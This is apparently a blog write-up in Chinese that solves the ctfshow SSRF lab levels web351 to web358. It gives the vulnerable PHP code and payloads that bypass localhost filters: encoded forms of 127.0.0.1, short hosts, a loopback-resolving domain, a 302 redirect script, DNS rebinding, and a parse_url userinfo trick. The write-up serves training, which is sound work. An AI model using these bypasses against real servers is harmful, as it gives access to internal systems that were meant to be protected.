ssrf(ctfshow)

ssrf
发布时间 :
字数:742 阅读 :
  1. web351
  2. web352
  3. web353
  4. web354
  5. web355
  6. web356
  7. web357
  8. web358

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);//初始化 cURL 会话
curl_setopt($ch, CURLOPT_HEADER, 0);//启用时会将头文件的信息作为数据流输出。
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。
$result=curl_exec($ch);//执行 cURL 会话
curl_close($ch);//关闭 cURL 会话
echo ($result);
?>

payload: url=127.0.0.1/flag.php

web352

parse_url()函数会解析url并返回关联数组

$url = 'http://username:password@hostname:9090/path?arg=value#anchor';
var_dump(parse_url($url));
array(8) {
  ["scheme"]=>
  string(4) "http"
  ["host"]=>
  string(8) "hostname"
  ["port"]=>
  int(9090)
  ["user"]=>
  string(8) "username"
  ["pass"]=>
  string(8) "password"
  ["path"]=>
  string(5) "/path"
  ["query"]=>
  string(9) "arg=value"
  ["fragment"]=>
  string(6) "anchor"
}

这关看似使用了正则匹配preg_match,但缺少参数,没啥用

url=http://127.0.0.1/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://0x7f.0.0.1/flag.php     //16进制
url=http://0177.0.0.1/flag.php	   //8进制
url=http://2130706433/flag.php     //10进制整数格式
url=http://0x7F000001/flag.php     //16进制整数格式
url=http://127.0.1/flag.php
url=http://127.1/flag.php

web353

直接绕过

url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
url=http://127.1/flag.php

web354

这题把0和1都屏蔽了

http(s)://sudo.cc/指向127.0.0.1

url=http://sudo.cc/flag.php

也可以用自己的域名,让他解析到127.0.0.1来用

<?php header("Location: http://127.0.0.1/flag.php");
# POST: url=http://your-domain/ssrf.php

web355

多了一个限制让host位数小于5

url=http://0/flag.php
url=http://127.1/flag.php

web356

限制host位数小于3

url=http://0/flag.php

web357

利用302跳转和dns重绑定都可以。

<?php
header("Location:http://127.0.0.1/flag.php");

然后payload写自己的这个地址就可以了。
payload:http://xxx/a.php

2、在这个网站注册一个账号http://ceye.io/,然后会给你分配一个域名,修改成如下的内容,第一个随便填,第二个写127.0.0.1

多试几次就可以

web358

url必须以http://ctf.开头,必须以show结尾。
以show结尾比较好办,要么#show,要么?a=show这样的都可以。
http://ctf.开头的话,加上一个@127.0.0.1就可以绕过了,这样parse_url解析出来的host是127.0.0.1,考虑到ftp://user[:pass]@ip[:port]/path,因此前面的ctf.会被解析成user。

url=http://ctf.@127.0.0.1/flag.php#show
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

©2023-2026 Secfeng

Built with Hexo and 3-hexo theme